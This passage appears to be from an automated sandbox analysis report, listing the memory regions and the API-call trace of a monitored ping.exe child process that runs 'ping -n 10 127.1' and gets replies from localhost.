region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1678 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1679 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1680 start_va = 0x7f6c0000 end_va = 0x7f7bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6c0000" filename = "" Region: id = 1710 start_va = 0xb40000 end_va = 0xb42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1711 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 1712 start_va = 0xca0000 end_va = 0xca2fff entry_point = 0xca0000 region_type = mapped_file name = "notepad.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\notepad.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\notepad.exe.mui") Region: id = 1713 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1714 start_va = 0xcd0000 end_va = 0xcd0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1715 start_va = 0xce0000 end_va = 0xce3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 1716 start_va = 0xcf0000 end_va = 0xcf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 1717 start_va = 0xd00000 end_va = 0xd03fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 1718 start_va = 0xef0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1719 start_va = 0xf00000 end_va = 0x1087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 1720 start_va = 0x1090000 end_va = 0x1210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 1721 start_va = 0x1220000 end_va = 0x261ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 1722 start_va = 0x2620000 end_va = 0x2710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 1723 start_va = 0x2770000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 1724 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1725 start_va = 0x748c0000 end_va = 0x748d7fff entry_point = 0x748c0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1726 start_va = 0x748e0000 end_va = 0x749bafff entry_point = 0x748e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1727 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1728 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1729 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1730 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 62 os_tid = 0x964 Process: id = "37" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x1664f000" os_pid = "0x408" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 10 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1640 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1641 start_va = 0xe80000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1642 start_va = 0xea0000 end_va = 0xea1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1643 start_va = 0xeb0000 end_va = 0xebefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 1644 start_va = 0xec0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1645 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1646 start_va = 0xf40000 end_va = 0xf43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1647 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 1648 start_va = 0xf60000 end_va = 0xf61fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1649 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1650 start_va = 0x7f4f0000 end_va = 0x7f512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4f0000" filename = "" Region: id = 1651 start_va = 0x7f518000 end_va = 0x7f518fff entry_point = 0x0 region_type = private name = "private_0x000000007f518000" filename = "" Region: id = 1652 start_va = 0x7f519000 end_va = 0x7f519fff entry_point = 0x0 region_type = private name = "private_0x000000007f519000" filename = "" Region: id = 1653 start_va = 0x7f51d000 end_va = 0x7f51ffff entry_point = 0x0 region_type = private name = "private_0x000000007f51d000" filename = "" Region: id = 1654 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1655 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1656 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1657 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1681 start_va = 0x1120000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1682 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1683 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1684 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1685 start_va = 0xe80000 end_va = 0xe8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 1686 start_va = 0xe90000 end_va = 0xe93fff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 1687 start_va = 0xfb0000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1688 start_va = 0x1110000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 1689 start_va = 0x1130000 end_va = 0x11adfff entry_point = 0x1130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1690 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1691 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1692 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1693 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1694 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1695 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1696 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1697 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1698 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1699 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1700 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1701 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1702 start_va = 0x7f3f0000 end_va = 0x7f4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3f0000" filename = "" Region: id = 1703 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1704 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1705 start_va = 0x7f51a000 end_va = 0x7f51cfff entry_point = 0x0 region_type = private name = "private_0x000000007f51a000" filename = "" Region: id = 1706 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1707 start_va = 0xea0000 end_va = 0xea2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 1708 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 1709 start_va = 0x1100000 end_va = 0x1102fff entry_point = 0x1100000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 1731 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1732 start_va = 0x11f0000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 1733 start_va = 0x7f515000 end_va = 0x7f517fff entry_point = 0x0 region_type = private name = "private_0x000000007f515000" filename = "" Thread: id = 63 os_tid = 0x4c8 [0048.493] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0048.494] __set_app_type (_Type=0x1) [0048.494] __p__fmode () returned 0x76ea1768 [0048.494] __p__commode () returned 0x76ea176c [0048.494] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0048.494] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0048.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.496] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.496] _fileno (_File=0x76ea4c28) returned 1 [0048.496] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.496] GetFileType (hFile=0x28) returned 0x2 [0048.496] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efe8 | out: lpMode=0xf3efe8) returned 0 [0048.496] GetLastError () returned 0x6 [0048.496] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef4c, nSize=0x50 | out: lpBuffer="䤐û") returned 0x0 [0048.496] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0048.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xf3f004 | out: phkResult=0xf3f004*=0x88) returned 0x0 [0048.499] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xf3eff8, lpData=0xf3f000, lpcbData=0xf3effc*=0x4 | out: lpType=0xf3eff8*=0x0, lpData=0xf3f000*=0x0, lpcbData=0xf3effc*=0x4) returned 0x2 [0048.499] RegCloseKey (hKey=0x88) returned 0x0 [0048.499] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xf3efc8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xf3f004 | out: ppResult=0xf3f004*=0xfbc430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xfb8910*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0048.499] FreeAddrInfoW (pAddrInfo=0xfbc430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xfb8910*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0048.499] IcmpCreateFile () returned 0xfb6bb8 [0048.513] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xfbc340 [0048.513] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xfc5270 [0048.513] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xf3f100, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0048.515] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="竈ü杻ó┗\x94䰨盪❋") returned 0x14 [0048.516] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.516] GetFileType (hFile=0x28) returned 0x2 [0048.516] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0048.516] GetLastError () returned 0x6 [0048.516] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó❋") returned 0x0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0048.516] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0048.516] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xfc7b00 [0048.516] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xfc7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _write (in: _FileHandle=1, _Buf=0xfc7b00*, _MaxCharCount=0x14 | out: _Buf=0xfc7b00*) returned 20 [0048.516] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0048.516] LocalFree (hMem=0xfc7b00) returned 0x0 [0048.516] LocalFree (hMem=0xfc7ac8) returned 0x0 [0048.516] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="竈ü杻ó▪\x94䰨盪❚") returned 0x18 [0048.516] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.516] GetFileType (hFile=0x28) returned 0x2 [0048.516] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0048.516] GetLastError () returned 0x6 [0048.516] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó❚") returned 0x0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0048.516] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0048.516] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xfbc2f0 [0048.516] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xfbc2f0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _write (in: _FileHandle=1, _Buf=0xfbc2f0*, _MaxCharCount=0x18 | out: _Buf=0xfbc2f0*) returned 24 [0048.516] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.516] _fileno (_File=0x76ea4c28) returned 1 [0048.516] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0048.516] LocalFree (hMem=0xfbc2f0) returned 0x0 [0048.516] LocalFree (hMem=0xfc7ac8) returned 0x0 [0048.517] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0048.517] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0048.518] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0048.518] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="笈ü杻ó⛔\x94䰨盪✣") returned 0x16 [0048.518] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.518] GetFileType (hFile=0x28) returned 0x2 [0048.518] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0048.518] GetLastError () returned 0x6 [0048.518] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.518] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0048.518] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc7b40 [0048.518] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _write (in: _FileHandle=1, _Buf=0xfc7b40*, _MaxCharCount=0x16 | out: _Buf=0xfc7b40*) returned 22 [0048.518] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.518] LocalFree (hMem=0xfc7b40) returned 0x0 [0048.518] LocalFree (hMem=0xfc7b08) returned 0x0 [0048.518] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="笈ü杻ó⛿\x94䰨盪✼") returned 0x9 [0048.518] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.518] GetFileType (hFile=0x28) returned 0x2 [0048.518] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0048.518] GetLastError () returned 0x6 [0048.518] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.518] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0048.518] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0048.518] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0048.518] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.518] LocalFree (hMem=0xfb8a18) returned 0x0 [0048.518] LocalFree (hMem=0xfc7b08) returned 0x0 [0048.518] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="笈ü杻ó➷\x94䰨盪✧") returned 0x9 [0048.518] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0048.518] _fileno (_File=0x76ea4c28) returned 1 [0048.518] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.518] GetFileType (hFile=0x28) returned 0x2 [0048.518] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0048.518] GetLastError () returned 0x6 [0048.518] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0048.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0048.519] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0048.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0048.519] _fileno (_File=0x76ea4c28) returned 1 [0048.519] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0048.519] fflush (in: _File=0x76ea4c28 | 